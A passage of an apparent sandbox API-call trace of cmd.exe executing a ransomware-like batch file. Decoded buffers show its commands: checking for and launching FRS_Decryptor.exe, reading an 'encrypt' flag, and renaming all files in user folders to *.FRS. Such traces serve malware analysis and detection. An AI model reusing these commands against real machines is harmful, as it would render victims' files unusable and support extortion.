dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x36c, hThread=0x2b8, dwProcessId=0x37c, dwThreadId=0x750)) returned 1 [0101.991] CloseHandle (hObject=0x2b8) returned 1 [0101.991] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0101.991] GetEnvironmentStringsW () returned 0xd7e510* [0101.991] FreeEnvironmentStringsA (penv="=") returned 1 [0101.991] WaitForSingleObject (hHandle=0x36c, dwMilliseconds=0xffffffff) returned 0x0 [0104.038] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0104.038] CloseHandle (hObject=0x36c) returned 1 [0104.038] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0104.038] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0104.038] GetEnvironmentStringsW () returned 0xd30508* [0104.039] FreeEnvironmentStringsA (penv="=") returned 1 [0104.039] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0104.039] GetEnvironmentStringsW () returned 0xd7e510* [0104.039] FreeEnvironmentStringsA (penv="=") returned 1 [0104.039] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0104.039] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0104.039] _close (_FileHandle=3) returned 0 [0104.039] _get_osfhandle (_FileHandle=1) returned 0x28 [0104.039] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0104.039] _get_osfhandle (_FileHandle=1) returned 0x28 [0104.039] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0104.039] _get_osfhandle (_FileHandle=0) returned 0x24 [0104.039] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0104.039] SetConsoleInputExeNameW () returned 0x1 [0104.039] GetConsoleOutputCP () returned 0x1b5 [0104.040] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0104.040] SetThreadUILanguage (LangId=0x0) returned 0x409 [0104.040] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0104.040] _open_osfhandle (_OSFileHandle=0x158, _Flags=8) returned 3 [0104.040] _get_osfhandle (_FileHandle=3) returned 0x158 [0104.040] SetFilePointer (in: hFile=0x158, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0104.040] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0104.040] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0104.041] SetFilePointer (in: hFile=0x158, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0104.041] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0104.041] GetFileType (hFile=0x158) returned 0x1 [0104.041] _get_osfhandle (_FileHandle=3) returned 0x158 [0104.041] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0104.041] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0104.041] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0104.041] SetFilePointer (in: hFile=0x158, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0104.041] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0104.041] GetFileType (hFile=0x158) returned 0x1 [0104.041] _get_osfhandle (_FileHandle=3) returned 0x158 [0104.041] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0104.041] _tell (_FileHandle=3) returned 2627 [0104.041] _close (_FileHandle=3) returned 0 [0104.041] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0104.041] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0104.041] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0104.041] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0104.041] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0104.045] feof (_File=0x76ea4c68) returned 0 [0104.045] ferror (_File=0x76ea4c68) returned 0 [0104.045] fgets (in: _Buf=0xd818e0, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0104.482] feof (_File=0x76ea4c68) returned 0 [0104.482] ferror (_File=0x76ea4c68) returned 0 [0104.482] fgets (in: _Buf=0xd86a16, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0104.543] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0104.544] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd430f6, cbMultiByte=78, lpWideCharStr=0xd430a8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0104.544] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0104.544] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0104.545] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x318 [0104.545] _open_osfhandle (_OSFileHandle=0x318, _Flags=8) returned 3 [0104.545] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.545] SetFilePointer (in: hFile=0x318, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0104.545] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.545] GetFileSize (in: hFile=0x318, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0104.545] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0104.545] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.545] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0104.545] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.545] GetFileType (hFile=0x318) returned 0x1 [0104.545] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0104.545] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0104.545] SetFilePointer (in: hFile=0x318, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0104.545] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0104.545] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0104.545] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.545] GetFileType (hFile=0x318) returned 0x1 [0104.545] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0104.545] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0104.545] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0104.545] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0104.545] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.545] GetFileType (hFile=0x318) returned 0x1 [0104.545] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0104.545] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0104.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.546] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.546] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.546] GetFileType (hFile=0x318) returned 0x1 [0104.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.546] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0104.546] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0104.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0104.546] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.546] GetFileType (hFile=0x318) returned 0x1 [0104.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0104.546] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0104.546] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0104.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0104.546] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.546] GetFileType (hFile=0x318) returned 0x1 [0104.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0104.546] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0104.546] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0104.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0104.546] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.546] GetFileType (hFile=0x318) returned 0x1 [0104.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0104.546] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0104.546] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0104.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0104.547] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.547] GetFileType (hFile=0x318) returned 0x1 [0104.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0104.547] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0104.547] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0104.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0104.547] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.547] GetFileType (hFile=0x318) returned 0x1 [0104.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0104.547] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0104.547] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0104.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0104.547] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.547] GetFileType (hFile=0x318) returned 0x1 [0104.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0104.547] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0104.547] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0104.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0104.547] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.547] GetFileType (hFile=0x318) returned 0x1 [0104.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0104.547] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0104.547] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0104.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0104.548] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.548] GetFileType (hFile=0x318) returned 0x1 [0104.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0104.548] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0104.548] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0104.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0104.548] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.548] GetFileType (hFile=0x318) returned 0x1 [0104.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0104.548] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0104.548] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0104.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0104.548] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.548] GetFileType (hFile=0x318) returned 0x1 [0104.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0104.548] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0104.548] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0104.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0104.548] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.548] GetFileType (hFile=0x318) returned 0x1 [0104.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0104.548] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0104.548] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0104.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0104.548] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.548] GetFileType (hFile=0x318) returned 0x1 [0104.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0104.549] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0104.549] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0104.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0104.549] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.549] GetFileType (hFile=0x318) returned 0x1 [0104.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0104.549] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0104.549] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, 